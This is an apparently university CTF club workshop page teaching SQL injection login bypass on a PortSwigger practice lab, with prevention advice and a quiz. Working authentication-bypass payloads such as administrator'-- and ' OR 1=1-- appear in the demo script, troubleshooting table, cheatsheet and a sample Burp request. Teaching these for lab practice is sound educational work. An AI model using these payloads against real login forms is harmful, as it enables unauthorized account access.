SPRING 2026 · CTF WORKSHOP SERIES · PSU

Injection
Attacks

If a website builds its database commands from what users type, an attacker can turn a simple login box into a way to read or change every record. Today we'll use that trick to log in without a password.

▶ Start Workshop Skip to Challenge →
SCROLL TO BEGIN
SECTION 01 · LEARNING OBJECTIVES

What You'll Learn

By the end of this topic, you'll be able to spot, exploit, and prevent one of the most critical web vulnerabilities.

01
Identify
Locate injection points in web application input fields (login, search, filters).
02
Exploit
Perform a basic SQL injection to bypass authentication and gain unauthorized access.
03
Prevent
Apply input validation and parameterized queries to stop injection attacks.
SECTION 02 · CORE CONCEPTS

SQL Injection

When user input is dropped directly into a database query, attackers can change the structure of that query—turning data into code.

THE MECHANISM
Why it works
A single quote (') ends a string, and two hyphens (--) start a SQL comment. Combine them, and the rest of the query—including the password check—becomes a note the database ignores.
THE RULE
Data vs. Code
The system fails whenever it cannot tell data apart from code. Parameterized queries keep that line sharp; string concatenation erases it.
Turning the password check into a comment
A// What the server expects
SELECT * FROM users WHERE username = 'input' AND password = 'input';
B// What the attacker types into the login form
username: administrator'-- password: anything
C// What the database actually runs
SELECT * FROM users WHERE username = 'administrator'-- ' AND password = 'anything';
everything after -- is treated as a comment and ignored

The attacker closes the username string with a quote, then uses -- to comment out the password check. The database returns the first matching user—often administrator.

SECTION 03 · HOW IT WORKS

The 5‑Step Injection

From normal input to unauthorized access: how a tester probes for SQL injection.

01
Capture User Input
FIND EVERY FIELD THAT TOUCHES THE DATABASE
  • App accepts input from a form (username, password, search)
  • Input is concatenated directly into a database query on the server
02
Inject Malicious Input
BREAK OUT OF THE EXPECTED STRING
  • Attacker enters administrator'-- to terminate the quoted field
  • Payload changes query structure, not just values
03
Alter Query Logic
PROMOTE PAYLOAD FROM DATA TO CODE
  • Injected input is parsed as SQL, not stored as literal
  • Comment markers (-- or #) remove the rest of the query
04
Execute Modified Query
LET THE DATABASE DO THE WORK
  • Database runs altered statement without complaint
  • Password verification skipped (commented out)
05
Gain Unauthorized Access
CONFIRM BYPASS END‑TO‑END
  • Attacker logged in as first matching user (administrator)
  • System treats all subsequent requests as that privileged account
SECTION 04 · DEMO WALKTHROUGH
DEMO.
PortSwigger Lab: SQL injection login bypass
LAB
SQL injection: login bypass
BROWSER
Chrome / Safari
STATE
Lab opened, login visible
▶ SCRIPT
# Step 1: Try a normal login
Username: admin   Password: 1234 (any wrong password)
→ Expected: Login fails ("invalid credentials")

# Step 2: Inject the payload
Username: administrator'--   Password: anything
(Note: single quote, two hyphens, then a space)
→ Expected: You are logged in as administrator. Lab solved.

# The payload, anatomized
administrator'-- 
→ Closes the username string, comments out password check
Follow along on your laptop. We will run through this together.
SECTION 05 · COMMON PITFALLS

Troubleshooting

SYMPTOM
Payload looks correct but login fails
CAUSEModified wrong request (not the lab's login request)
FIXEnsure POST goes to lab host, not main PortSwigger site
SYMPTOM
Injection has no effect
CAUSEMissing space after --
FIXAlways use -- with a trailing space
SYMPTOM
Changes don't affect result
CAUSEEdited response or replayed already‑sent request
FIXIntercept before sending, or use Repeater
SYMPTOM
Server rejects quote character
CAUSEBasic input sanitization stripping single quote
FIXTry alternate payload: ' OR 1=1--
SECTION 06 · POP QUIZ

Test Your Knowledge

YOUR SCORE
0 / 5
QUESTION 01 / 05
What is the primary cause of SQL injection vulnerabilities?
QUESTION 02 / 05
In the payload administrator'--, what is the purpose of the two hyphens?
QUESTION 03 / 05
Which of the following is the most effective defense against SQL injection?
QUESTION 04 / 05
You try admin'-- but nothing happens. What is the most likely mistake?
QUESTION 05 / 05
What is the key principle that parameterized queries enforce?
SECTION 07 · YOUR CHALLENGE

Now Do It Yourself

⏱ 5-10 MIN◉ BEGINNER
THE TASK
Use the provided lab to bypass the login form and gain access to the administrator account by modifying the login request.
SUCCESS CRITERION
Screenshot showing you are logged in as administrator (account page or admin dashboard visible).
HINTS
01
Look closely at how your input is used inside the login request.
02
Try breaking the query so the password check is ignored.
03
Use a payload like administrator'-- (with a space after hyphens).
CHEATSHEET · PAYLOADS & PATTERNS
COMMAND / PAYLOAD WHAT IT DOES WHEN TO USE
administrator'-- Comments out password check Login bypass when username known
' OR 1=1-- Makes WHERE condition always true Login bypass when username unknown
' OR '1'='1-- Boolean-based always‑true variant Basic auth bypass, alternate syntax
'-- Truncates query early Probing if field is injectable
' OR 1=1# MySQL comment alternative When -- is stripped or fails
▶ INTERCEPTED REQUEST (Burp)
1POST /login HTTP/1.1
2Host: lab-portswigger.net
3...
4username=administrator'--&password=anything
SECTION 08 · FURTHER READING

Go Deeper

01

PortSwigger: SQL Injection

Interactive labs and real attack scenarios to practice and deepen understanding.

02

OWASP SQL Injection Prevention Cheat Sheet

Industry‑standard defensive techniques and secure coding practices.

03

OWASP Top 10: Injection

High‑level overview of why injection remains critical and how it impacts real systems.

📎

Injection Attacks Handout (PDF)

Full workshop packet with the Day 3 reference notes and cheatsheet.
Questions?
Bring them to the CTF WhatsApp Group.
CyberTech Club @ PSU · Spring 2026